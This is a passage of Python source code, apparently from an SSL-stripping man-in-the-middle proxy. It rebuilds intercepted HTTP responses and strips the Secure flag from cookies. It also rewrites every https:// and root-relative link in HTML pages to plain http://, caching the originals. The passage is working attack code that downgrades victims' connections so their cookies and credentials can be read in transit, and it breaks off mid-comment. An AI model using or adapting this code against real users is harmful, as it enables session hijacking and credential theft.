        elif self.response.content_type == 'application/javascript':
            body = self.strip_text(await self.response.text())
        elif self.response.content_type == 'text/css':
            body = self.strip_text(await self.response.text())
        else:
            body = await self.response.read()
            # response.release()

        headers = self.filter_and_strip_headers(dict(self.response.headers))

        stripped_response = aiohttp.web.Response(body=body,
                                                 status=self.response.status,
                                                 headers=headers)

        # Remove the Secure flag from cookies.
        for name, value, directives in self.strip_cookies(self.response.cookies,
                                                          self.response.url.host):
            stripped_response.set_cookie(name, value, **directives)

        return stripped_response

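    # strip_html_body walks the parsed DOM, records every https:// or
    # root-relative URL attribute in the client cache, and rewrites each
    # one in place to a plain http:// equivalent.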
    def strip_html_body(self, body):
        soup = bs4.BeautifulSoup(body, 'html.parser')
        secure_url_attrs = []

        def has_secure_url_attr(tag):
            found = False
            url_attrs = []
            for attr_name, attr_value in tag.attrs.items():
                # Multi-valued attributes (e.g. class) come back as lists.
                if isinstance(attr_value, list):
                    attr_value = ' '.join(attr_value)

                if regex.SECURE_URL.fullmatch(attr_value):
                    url_attrs.append(attr_name)
                    self.cache.add_url(attr_value)
                    found = True
                elif regex.RELATIVE_URL.fullmatch(attr_value):
                    url_attrs.append(attr_name)
                    self.cache.add_url(attr_value, host=self.host)
                    found = True

            # Matching tags and their attribute names stay index-aligned
            # with the list returned by find_all below.
            if url_attrs:
                secure_url_attrs.append(url_attrs)

            return found

        secure_tags = soup.find_all(has_secure_url_attr)

        for i, tag in enumerate(secure_tags):
            for attr in secure_url_attrs[i]:
                secure_url = tag[attr]
                if secure_url.startswith('/'):
                    tag[attr] = 'http://{}{}'.format(self.host, secure_url)
                else:
                    parsed_url = urllib.parse.urlsplit(secure_url)
                    tag[attr] = urllib.parse.urlunsplit(parsed_url._replace(scheme='http'))

        # strip secure URLs from